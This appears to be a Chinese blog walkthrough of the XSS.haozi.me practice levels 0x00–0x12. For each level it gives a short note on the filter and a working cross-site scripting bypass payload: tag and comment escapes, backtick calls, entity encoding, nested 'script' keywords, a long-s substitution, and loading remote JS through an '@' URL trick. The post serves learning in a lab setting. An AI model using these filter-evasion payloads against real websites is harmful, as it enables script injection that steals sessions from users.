所有的授权实战入侵网站已添加“如何入侵”标签,在侧边栏的归档中选择“如何入侵”即可查看所有文章

MENU

XSS.haozi.me的XSS练习

August 18, 2020 • Read: 1289 • 常山阅读设置

0x00

<script>alert(1)</script>

0x01

html中闭合即可执行

<script>alert(1)</script>

0x02

html中闭合input标签

"><script>alert(1)</script>

0x03

服务器过滤括号(),不使用括号即可

<script>alert`1`</script>

0x04

服务器过滤括号和反引号() \`
\<svg\>可以执行unicode

<svg><script>alert&#40;1&#41;</script></svg>

0x05

服务器将-->转义

--!><script>alert(1)</script>

0x06

服务器正则匹配on开头=结尾的全部转义

  1. onmouseover
    ="alert(1)"
  2. type=image src onerror
    =alert(1)

    类似即可

    0x07

    服务器正则匹配<>,以<开头,以>结尾的全部替换为空
    所以只以<开头,不写 >,即可

    <svg onmouseover="alert(1)" 

    0x08

    </style>转义为坏蛋两个字

    </style ><script>alert(1)</script>

    0x09

    必须包含提供的网址,输入网址后,对其中的</script>闭合构造新的语句

    http://www.sementfault.com"></script><script>alert(1)</script>

    0x0A

    &"'<>/进行了转义,并且必须包含网址,输入网址后,添加@及js地址,实现绕过

    http://[email protected]/j.js

    0x0B

    将输入的内容转义成大写,html、标签、域名不区分大小写,js区分大小写,让服务器返回J.JS即可

    <script src="http://127.0.0.1/xss_1/j.js"></script>

    0x0C

    过滤script,进行畸形构造scrscriptipt

    <scrscriptipt scr="http://127.0.0.1/j.js"></scrscriptipt>

    0x0D

    过滤了</'"并对alert()进行了注释,通过回车破坏注释结构,结束时使用-->注释掉')

    alert(1)
    -->

    0x0E

    <后面加一个字符进行过滤,即<s转义欸<_s
    使用ſ字符来替代s

    <ſcript scr="http://127.0.0.1/xss_1/j.js"

    0x0F

    &'"<>\进行过滤,但是浏览器会先解析html,再解析js

    ');alert('1

    0x10

    无过滤,直接在<script>中执行即可

    alert(1)

    0x11

    "转义为\",虽然转义,但是不影响闭合

    ");alert(1)//

    0x12

    "过滤为\",不影响注入,重新构造script

    </script><script>alert(1)</script>
Last Modified: August 16, 2021
Archives QR Code Tip
QR Code for this page
Tipping QR Code